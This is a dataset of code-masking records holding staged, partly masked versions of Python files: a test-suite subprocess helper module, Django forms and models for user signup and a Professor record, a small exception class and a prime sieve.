pidq, outputq))\n t.daemon = True\n t.start()\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq, 'Program to start')\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program thread to join')\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n if e.errno != 3:\n raise\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program to die')\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\n<mask token>\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\n<mask token>\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n atexit.register(rmtemp, f.name)\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 493)\n return name\n",
"step-2": "<mask token>\n\n\ndef wait_condition(cond, timeout=1, sleeptime=0.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n if timeout is None:\n timeout = 1\n if timeout < sleeptime:\n print('Warning, timeout cannot be smaller than', sleeptime)\n timeout = sleeptime\n tries = int(timeout / sleeptime)\n for i in range(tries):\n val = cond()\n if val is not None:\n break\n sleep(sleeptime)\n return val\n\n\ndef wait_process(pid, timeout=None):\n \"\"\"Wait for process to finish\n \"\"\"\n\n def process():\n try:\n os.kill(pid, 0)\n except OSError:\n return True\n else:\n return None\n return wait_condition(process, timeout)\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments['process']\n input = arguments['input']\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n pidq.put(None)\n outputq.put(('',\n \"Unexpected exception caught during execution: '{0}' . \".format\n (e), 255))\n return\n pidq.put(proc.pid)\n out, err = proc.communicate(input)\n out, err = out.decode('utf-8'), err.decode('utf-8')\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n thread.join(timeout)\n if thread.isAlive():\n raise TimeoutWaitingFor(thread_error + '. Unexpected error')\n try:\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor('streams from program')\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n output_timeout = 0.1\n pidq = Queue()\n outputq = Queue()\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq, 'Program to start')\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program thread to join')\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n if e.errno != 3:\n raise\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program to die')\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\ndef run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE, merge_streams=\n False, env=os.environ, timeout=None):\n \"\"\"Run a subprocess and wait for it to finish\"\"\"\n if input is None:\n stdin = None\n else:\n stdin = PIPE\n if merge_streams:\n stderr = STDOUT\n else:\n stderr = PIPE\n arguments = {'process': {'args': cmd, 'stdin': stdin, 'stdout': stdout,\n 'stderr': stderr, 'bufsize': 1, 'close_fds': ON_POSIX, 'env': env},\n 'input': input}\n out, err, exit = _get_output(arguments, timeout)\n if merge_streams:\n if exit != 0:\n raise CommandError(cmd, exit, out)\n else:\n return exit, out\n elif exit != 0:\n raise CommandError(cmd, exit, out, err)\n else:\n return exit, out, err\n\n\ndef run_cmd_wait_nofail(*args, **kwargs):\n \"\"\"Same as run_cmd_wait but silence the exception if it happens\"\"\"\n try:\n return run_cmd_wait(*args, **kwargs)\n except CommandError as e:\n return e.code, e.out, e.err\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given 
its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\n<mask token>\n\n\ndef parse_datafile(file):\n \"\"\"Parse .data files, treating files as JSON\n \"\"\"\n data = []\n with open(file) as fh:\n for line in fh:\n line = line.rstrip('\\n')\n if line.startswith('[') and line.endswith(']'):\n line = '{' + line[1:-1] + '}'\n if line.startswith('{'):\n data.append(json.loads(line))\n else:\n data.append(line)\n return data\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n atexit.register(rmtemp, f.name)\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 493)\n return name\n",
"step-3": "<mask token>\n\n\ndef shared_binary_location(cmd='shared'):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n return binary_location(cmd, SHARED_USE_PATH)\n\n\ndef binary_location(cmd, USE_PATH=False):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n\n\ndef wait_condition(cond, timeout=1, sleeptime=0.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n if timeout is None:\n timeout = 1\n if timeout < sleeptime:\n print('Warning, timeout cannot be smaller than', sleeptime)\n timeout = sleeptime\n tries = int(timeout / sleeptime)\n for i in range(tries):\n val = cond()\n if val is not None:\n break\n sleep(sleeptime)\n return val\n\n\ndef wait_process(pid, timeout=None):\n \"\"\"Wait for process to finish\n \"\"\"\n\n def process():\n try:\n os.kill(pid, 0)\n except OSError:\n return True\n else:\n return None\n return wait_condition(process, timeout)\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments['process']\n input = arguments['input']\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n pidq.put(None)\n outputq.put(('',\n \"Unexpected exception caught during execution: '{0}' . \".format\n (e), 255))\n return\n pidq.put(proc.pid)\n out, err = proc.communicate(input)\n out, err = out.decode('utf-8'), err.decode('utf-8')\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n thread.join(timeout)\n if thread.isAlive():\n raise TimeoutWaitingFor(thread_error + '. Unexpected error')\n try:\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor('streams from program')\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n output_timeout = 0.1\n pidq = Queue()\n outputq = Queue()\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq, 'Program to start')\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program thread to join')\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n if e.errno != 3:\n raise\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program to die')\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\ndef run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE, merge_streams=\n False, env=os.environ, timeout=None):\n \"\"\"Run a subprocess and wait for it to finish\"\"\"\n if input is None:\n stdin = None\n else:\n stdin = PIPE\n if merge_streams:\n stderr = STDOUT\n else:\n stderr = PIPE\n arguments = {'process': {'args': cmd, 'stdin': stdin, 'stdout': stdout,\n 'stderr': stderr, 'bufsize': 1, 'close_fds': ON_POSIX, 'env': env},\n 'input': input}\n out, err, exit = _get_output(arguments, timeout)\n if merge_streams:\n if exit != 0:\n raise CommandError(cmd, exit, out)\n else:\n return exit, out\n elif exit != 0:\n raise CommandError(cmd, exit, out, err)\n else:\n return exit, out, 
err\n\n\ndef run_cmd_wait_nofail(*args, **kwargs):\n \"\"\"Same as run_cmd_wait but silence the exception if it happens\"\"\"\n try:\n return run_cmd_wait(*args, **kwargs)\n except CommandError as e:\n return e.code, e.out, e.err\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\n<mask token>\n\n\ndef parse_datafile(file):\n \"\"\"Parse .data files, treating files as JSON\n \"\"\"\n data = []\n with open(file) as fh:\n for line in fh:\n line = line.rstrip('\\n')\n if line.startswith('[') and line.endswith(']'):\n line = '{' + line[1:-1] + '}'\n if line.startswith('{'):\n data.append(json.loads(line))\n else:\n data.append(line)\n return data\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n atexit.register(rmtemp, f.name)\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 493)\n return name\n",
"step-4": "<mask token>\nON_POSIX = 'posix' in sys.builtin_module_names\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nBIN_PREFIX = os.path.abspath(os.path.join(CURRENT_DIR, '..', '..', 'src'))\nDEFAULT_CERT_PATH = os.path.abspath(os.path.join(CURRENT_DIR, '..',\n 'test_certs'))\nDEFAULT_EXTENSION_PATH = os.path.abspath(os.path.join(CURRENT_DIR, '..',\n 'test_extensions'))\nSHARED_SKIP = os.environ.get('SHARED_SKIP', False)\nSHARED_USE_PATH = os.environ.get('SHARED_USE_PATH', False)\nUUID_REGEXP = '[0-9A-Fa-f]{8}-' + '[0-9A-Fa-f]{4}-' * 3 + '[0-9A-Fa-f]{12}'\n\n\ndef shared_binary_location(cmd='shared'):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n return binary_location(cmd, SHARED_USE_PATH)\n\n\ndef binary_location(cmd, USE_PATH=False):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n\n\ndef wait_condition(cond, timeout=1, sleeptime=0.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n if timeout is None:\n timeout = 1\n if timeout < sleeptime:\n print('Warning, timeout cannot be smaller than', sleeptime)\n timeout = sleeptime\n tries = int(timeout / sleeptime)\n for i in range(tries):\n val = cond()\n if val is not None:\n break\n sleep(sleeptime)\n return val\n\n\ndef wait_process(pid, timeout=None):\n \"\"\"Wait for process to finish\n \"\"\"\n\n def process():\n try:\n os.kill(pid, 0)\n except OSError:\n return True\n else:\n return None\n return wait_condition(process, timeout)\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments['process']\n input = arguments['input']\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n pidq.put(None)\n outputq.put(('',\n \"Unexpected exception caught during execution: '{0}' . \".format\n (e), 255))\n return\n pidq.put(proc.pid)\n out, err = proc.communicate(input)\n out, err = out.decode('utf-8'), err.decode('utf-8')\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n thread.join(timeout)\n if thread.isAlive():\n raise TimeoutWaitingFor(thread_error + '. 
Unexpected error')\n try:\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor('streams from program')\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n output_timeout = 0.1\n pidq = Queue()\n outputq = Queue()\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq, 'Program to start')\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program thread to join')\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n if e.errno != 3:\n raise\n state = wait_process(pid, timeout)\n if state:\n return _retrieve_output(t, output_timeout, outputq,\n 'Program to die')\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\ndef run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE, merge_streams=\n False, env=os.environ, timeout=None):\n \"\"\"Run a subprocess and wait for it to finish\"\"\"\n if input is None:\n stdin = None\n else:\n stdin = PIPE\n if merge_streams:\n stderr = STDOUT\n else:\n stderr = PIPE\n arguments = {'process': {'args': cmd, 'stdin': stdin, 'stdout': stdout,\n 'stderr': stderr, 'bufsize': 1, 'close_fds': ON_POSIX, 'env': env},\n 'input': input}\n out, err, exit = _get_output(arguments, timeout)\n if merge_streams:\n if exit != 0:\n raise CommandError(cmd, exit, out)\n else:\n return exit, out\n elif exit != 0:\n raise CommandError(cmd, exit, out, err)\n else:\n return exit, out, err\n\n\ndef run_cmd_wait_nofail(*args, **kwargs):\n \"\"\"Same as run_cmd_wait but silence the exception if it happens\"\"\"\n try:\n return run_cmd_wait(*args, **kwargs)\n except CommandError as e:\n return e.code, e.out, e.err\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\n<mask token>\nwhich = memoize(which)\n\n\ndef parse_datafile(file):\n \"\"\"Parse .data files, treating files as JSON\n \"\"\"\n data = []\n with open(file) as fh:\n for line in fh:\n line = line.rstrip('\\n')\n if line.startswith('[') and line.endswith(']'):\n line = '{' + line[1:-1] + '}'\n if line.startswith('{'):\n data.append(json.loads(line))\n else:\n data.append(line)\n return data\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n atexit.register(rmtemp, f.name)\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 493)\n return name\n",
"step-5": "# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport socket\nimport signal\nimport functools\nimport atexit\nimport tempfile\nfrom subprocess import Popen, PIPE, STDOUT\nfrom threading import Thread\nfrom queue import Queue, Empty\nfrom time import sleep\nimport json\nfrom .exceptions import CommandError, TimeoutWaitingFor\n\nON_POSIX = 'posix' in sys.builtin_module_names\n\n# Directory relative to basetest module location\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# Location of binary files (usually the src/ folder)\nBIN_PREFIX = os.path.abspath(\n os.path.join(CURRENT_DIR, \"..\", \"..\", \"src\")\n)\n\n# Default location of test certificates\nDEFAULT_CERT_PATH = os.path.abspath(\n os.path.join(CURRENT_DIR, \"..\", \"test_certs\")\n)\n\n# Default location of test extensions\nDEFAULT_EXTENSION_PATH = os.path.abspath(\n os.path.join(CURRENT_DIR, \"..\", \"test_extensions\")\n)\n\n\n# Environment flags to control skipping of shared tests\nSHARED_SKIP = os.environ.get(\"SHARED_SKIP\", False)\n# Environment flags to control use of PATH or in-tree binaries\nSHARED_USE_PATH = os.environ.get(\"SHARED_USE_PATH\", False)\n\nUUID_REGEXP = (\"[0-9A-Fa-f]{8}-\" + (\"[0-9A-Fa-f]{4}-\" * 3) + \"[0-9A-Fa-f]{12}\")\n\n\ndef shared_binary_location(cmd=\"shared\"):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n return binary_location(cmd, SHARED_USE_PATH)\n\n\ndef binary_location(cmd, USE_PATH=False):\n \"\"\" ../src/ is used by default.\n \"\"\"\n return os.path.join(BIN_PREFIX, cmd)\n\n\ndef wait_condition(cond, timeout=1, sleeptime=.01):\n \"\"\"Wait for condition to return anything other than None\n \"\"\"\n # NOTE Increasing sleeptime can dramatically increase testsuite runtime\n # It also reduces CPU load significantly\n if timeout is None:\n timeout = 1\n\n if timeout < sleeptime:\n print(\"Warning, timeout cannot be smaller than\", sleeptime)\n timeout = sleeptime\n\n # Max number of attempts until giving up\n tries = int(timeout / sleeptime)\n\n for i in range(tries):\n val = cond()\n\n if val is not None:\n break\n\n sleep(sleeptime)\n\n return val\n\n\ndef wait_process(pid, timeout=None):\n \"\"\"Wait for process to finish\n \"\"\"\n def process():\n try:\n os.kill(pid, 0)\n except OSError:\n # Process is dead\n return True\n else:\n # Process is still ticking\n return None\n\n return wait_condition(process, timeout)\n\n\ndef _queue_output(arguments, pidq, outputq):\n \"\"\"Read/Write output/input of given process.\n This function is meant to be executed in a thread as it may block\n \"\"\"\n kwargs = arguments[\"process\"]\n input = arguments[\"input\"]\n\n try:\n proc = Popen(**kwargs)\n except OSError as e:\n # pid None is read by the main thread as a crash of the process\n pidq.put(None)\n\n outputq.put((\n \"\",\n (\"Unexpected exception caught during execution: '{0}' . \".format(e)),\n 255)) # false exitcode\n\n return\n\n # Put the PID in the queue for main process to know.\n pidq.put(proc.pid)\n\n # Send input and wait for finish\n out, err = proc.communicate(input)\n\n out, err = out.decode('utf-8'), err.decode('utf-8')\n\n # Give the output back to the caller\n outputq.put((out, err, proc.returncode))\n\n\ndef _retrieve_output(thread, timeout, queue, thread_error):\n \"\"\"Fetch output from binary subprocess queues\n \"\"\"\n # Try to join the thread on failure abort\n thread.join(timeout)\n if thread.isAlive():\n # Join should have killed the thread. This is unexpected\n raise TimeoutWaitingFor(thread_error + \". 
Unexpected error\")\n\n # Thread died so we should have output\n try:\n # data = (stdout, stderr, exitcode)\n data = queue.get(timeout=timeout)\n except Empty:\n data = TimeoutWaitingFor(\"streams from program\")\n\n return data\n\n\ndef _get_output(arguments, timeout=None):\n \"\"\"Collect output from the subprocess without blocking the main process if\n subprocess hangs.\n \"\"\"\n # NOTE Increase this value if tests fail with None being received as\n # stdout/stderr instead of the expected content\n output_timeout = 0.1 # seconds\n\n pidq = Queue()\n outputq = Queue()\n\n t = Thread(target=_queue_output, args=(arguments, pidq, outputq))\n t.daemon = True\n t.start()\n\n try:\n pid = pidq.get(timeout=timeout)\n except Empty:\n pid = None\n\n # Process crashed or timed out for some reason\n if pid is None:\n return _retrieve_output(t, output_timeout, outputq,\n \"Program to start\")\n\n # Wait for process to finish (normal execution)\n state = wait_process(pid, timeout)\n\n if state:\n # Process finished\n return _retrieve_output(t, output_timeout, outputq,\n \"Program thread to join\")\n\n # If we reach this point we assume the process got stuck or timed out\n for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):\n # Start with lower signals and escalate if process ignores them\n try:\n os.kill(pid, signal.SIGABRT)\n except OSError as e:\n # 3 means the process finished/died between last check and now\n if e.errno != 3:\n raise\n\n # Wait for process to finish (should die/exit after signal)\n state = wait_process(pid, timeout)\n\n if state:\n # Process finished\n return _retrieve_output(t, output_timeout, outputq,\n \"Program to die\")\n\n # This should never happen but in case something goes really bad\n raise OSError(\"Program stopped responding and couldn't be killed\")\n\n\ndef run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE,\n merge_streams=False, env=os.environ, timeout=None):\n \"Run a subprocess and wait for it to finish\"\n\n if input is None:\n stdin = None\n else:\n stdin = PIPE\n\n if merge_streams:\n stderr = STDOUT\n else:\n stderr = PIPE\n\n arguments = {\n \"process\": {\n \"args\": cmd,\n \"stdin\": stdin,\n \"stdout\": stdout,\n \"stderr\": stderr,\n \"bufsize\": 1,\n \"close_fds\": ON_POSIX,\n \"env\": env,\n },\n \"input\": input,\n }\n out, err, exit = _get_output(arguments, timeout)\n\n if merge_streams:\n if exit != 0:\n raise CommandError(cmd, exit, out)\n else:\n return exit, out\n else:\n if exit != 0:\n raise CommandError(cmd, exit, out, err)\n else:\n return exit, out, err\n\n\ndef run_cmd_wait_nofail(*args, **kwargs):\n \"\"\"Same as run_cmd_wait but silence the exception if it happens\"\"\"\n try:\n return run_cmd_wait(*args, **kwargs)\n except CommandError as e:\n return e.code, e.out, e.err\n\n\ndef memoize(obj):\n \"\"\"Keep an in-memory cache of function results given its inputs\n \"\"\"\n cache = obj.cache = {}\n\n @functools.wraps(obj)\n def memoizer(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = obj(*args, **kwargs)\n return cache[key]\n return memoizer\n\n\nfrom shutil import which\nwhich = memoize(which)\n\n\ndef parse_datafile(file):\n \"\"\"Parse .data files, treating files as JSON\n \"\"\"\n data = []\n with open(file) as fh:\n for line in fh:\n line = line.rstrip(\"\\n\")\n\n # Turn [] strings into {} to be treated properly as JSON hashes\n if line.startswith('[') and line.endswith(']'):\n line = '{' + line[1:-1] + '}'\n\n if line.startswith(\"{\"):\n data.append(json.loads(line))\n else:\n 
data.append(line)\n return data\n\n\ndef mkstemp(data):\n \"\"\"\n Create a temporary file that is removed at process exit\n \"\"\"\n def rmtemp(name):\n try:\n os.remove(name)\n except OSError:\n pass\n\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(data)\n f.close()\n\n # Ensure removal at end of python session\n atexit.register(rmtemp, f.name)\n\n return f.name\n\n\ndef mkstemp_exec(data):\n \"\"\"Create a temporary executable file that is removed at process exit\n \"\"\"\n name = mkstemp(data)\n os.chmod(name, 0o755)\n\n return name\n\n# vim: ai sts=4 et sw=4\n",
"step-ids": [
7,
11,
13,
14,
16
]
}
|
[
7,
11,
13,
14,
16
] |
class DuplicatedBlockException(Exception):
code = 'duplicated_block_exception'
|
normal
|
{
"blob_id": "983e3b2902fe3bc701167da2f308fdaed612ae84",
"index": 1784,
"step-1": "<mask token>\n",
"step-2": "class DuplicatedBlockException(Exception):\n <mask token>\n",
"step-3": "class DuplicatedBlockException(Exception):\n code = 'duplicated_block_exception'\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django import forms
from django.contrib.auth.forms import UserCreationForm
from .models import AuthUser
class SignUpForm(forms.Form):
username = forms.CharField(widget=forms.TextInput(attrs={'class':
'form-control'}))
email = forms.EmailField(widget=forms.EmailInput(attrs={'class':
'form-control'}))
password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class':
'form-control'}))
password2 = forms.CharField(widget=forms.PasswordInput(attrs={'class':
'form-control'}))
first_name = forms.CharField(widget=forms.TextInput(attrs={'class':
'form-control'}))
last_name = forms.CharField(widget=forms.TextInput(attrs={'class':
'form-control'}))
class Meta:
model = AuthUser
fields = ('username', 'email', 'password1', 'password2',
'first_name', 'last_name')
class LoginForm(forms.Form):
username = forms.CharField(widget=forms.TextInput(attrs={'class':
'form-control'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class':
'form-control'}))
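# Example usage (illustrative sketch; field values are made up):
#
#     form = LoginForm(data={'username': 'alice', 'password': 'secret'})
#     assert form.is_valid()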
|
normal
|
{
"blob_id": "7644dcd956e1ad179f42e44870864386744c6cdf",
"index": 2553,
"step-1": "<mask token>\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n password = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n",
"step-2": "<mask token>\n\n\nclass SignUpForm(forms.Form):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n model = AuthUser\n fields = ('username', 'email', 'password1', 'password2',\n 'first_name', 'last_name')\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n password = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n",
"step-3": "<mask token>\n\n\nclass SignUpForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n email = forms.EmailField(widget=forms.EmailInput(attrs={'class':\n 'form-control'}))\n password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n password2 = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n first_name = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n last_name = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n\n\n class Meta:\n model = AuthUser\n fields = ('username', 'email', 'password1', 'password2',\n 'first_name', 'last_name')\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n password = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n",
"step-4": "from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .models import AuthUser\n\n\nclass SignUpForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n email = forms.EmailField(widget=forms.EmailInput(attrs={'class':\n 'form-control'}))\n password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n password2 = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n first_name = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n last_name = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n\n\n class Meta:\n model = AuthUser\n fields = ('username', 'email', 'password1', 'password2',\n 'first_name', 'last_name')\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(widget=forms.TextInput(attrs={'class':\n 'form-control'}))\n password = forms.CharField(widget=forms.PasswordInput(attrs={'class':\n 'form-control'}))\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
def sieve(limit):
numbers = list(range(3, limit, 2))
for prime in numbers:
for multiplier in reversed(range(2, limit)):
try:
numbers.remove(prime * multiplier)
except ValueError:
pass
return [2] + numbers
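# Example (illustrative): sieve(10) evaluates to [2, 3, 5, 7]. The repeated
# list.remove() calls make this far slower than a classic sieve, so it is only
# practical for small limits.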
|
normal
|
{
"blob_id": "ec7ca03f627eaa635aac56e302b9c40bf0a3da38",
"index": 1796,
"step-1": "<mask token>\n",
"step-2": "def sieve(limit):\n numbers = list(range(3, limit, 2))\n for prime in numbers:\n for multiplier in reversed(range(2, limit)):\n try:\n numbers.remove(prime * multiplier)\n except ValueError:\n pass\n return [2] + numbers\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from django.db import models
class Professor(models.Model):
nome = models.CharField(max_length=100)
apelido = models.CharField(max_length=30)
descricao = models.TextField(max_length=1000)
def __str__(self):
return self.nome
class ImagemProfessor(models.Model):
professor = models.ForeignKey(Professor, on_delete=models.CASCADE)
foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)
|
normal
|
{
"blob_id": "acb879cb72e5b3ac897a271dc680e4ca763d2122",
"index": 7541,
"step-1": "<mask token>\n\n\nclass ImagemProfessor(models.Model):\n professor = models.ForeignKey(Professor, on_delete=models.CASCADE)\n foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)\n",
"step-2": "<mask token>\n\n\nclass Professor(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass ImagemProfessor(models.Model):\n professor = models.ForeignKey(Professor, on_delete=models.CASCADE)\n foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)\n",
"step-3": "<mask token>\n\n\nclass Professor(models.Model):\n nome = models.CharField(max_length=100)\n apelido = models.CharField(max_length=30)\n descricao = models.TextField(max_length=1000)\n\n def __str__(self):\n return self.nome\n\n\nclass ImagemProfessor(models.Model):\n professor = models.ForeignKey(Professor, on_delete=models.CASCADE)\n foto = models.ImageField(upload_to='fotos/%d/%m/%Y/', blank=True)\n",
